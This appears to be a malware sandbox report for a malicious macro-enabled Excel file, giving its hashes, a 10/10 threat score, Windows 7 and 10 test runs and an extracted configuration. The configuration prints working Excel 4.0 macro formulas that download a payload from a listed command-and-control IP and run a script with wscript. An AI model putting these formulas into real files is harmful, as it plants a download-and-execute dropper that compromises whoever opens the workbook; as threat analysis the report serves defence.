a3c071544f7b0f6a1f37c464a79eb7c3 | Triage

Submit
Reports

Overview

overview

Static

static

a3c071544f...3.xlsm

windows7-x64

a3c071544f...3.xlsm

windows10-2004-x64

Sharing

Copy URL Twitter E-mail

Static task

static1

Behavioral task

behavioral1

Sample

a3c071544f7b0f6a1f37c464a79eb7c3.xlsm

Resource

win7-20231215-en

windows7-x64

7 signatures

150 seconds

Behavioral task

behavioral2

Sample

a3c071544f7b0f6a1f37c464a79eb7c3.xlsm

Resource

win10v2004-20231222-en

windows10-2004-x64

7 signatures

150 seconds

General

Target

a3c071544f7b0f6a1f37c464a79eb7c3
Size

6KB
MD5

a3c071544f7b0f6a1f37c464a79eb7c3
SHA1

37acbf1b7744711f4f74d19581bd914e000f1515
SHA256

703bdd7076d541e92c30d251d4d1de27e222bdb1fc06f2bb529500b78752ff20
SHA512

80c4f3c97a66357a0b929d77cecf25cf9eac1017a30ab3ab8af570f17ddc7efa3ef3167c136d982c78adec1ce47db563556c093ecf5d9c2bbabac61dcb10163c
SSDEEP

192:NDStuSDbrA2OmmfRi8UhHFBFYusb98yYrb+C:NauMM2wU1FYxb98y0V

Score

10^/10

xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes

formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

a3c071544f7b0f6a1f37c464a79eb7c3
.xlsm office2007

© 2018-2025

Terms | Privacy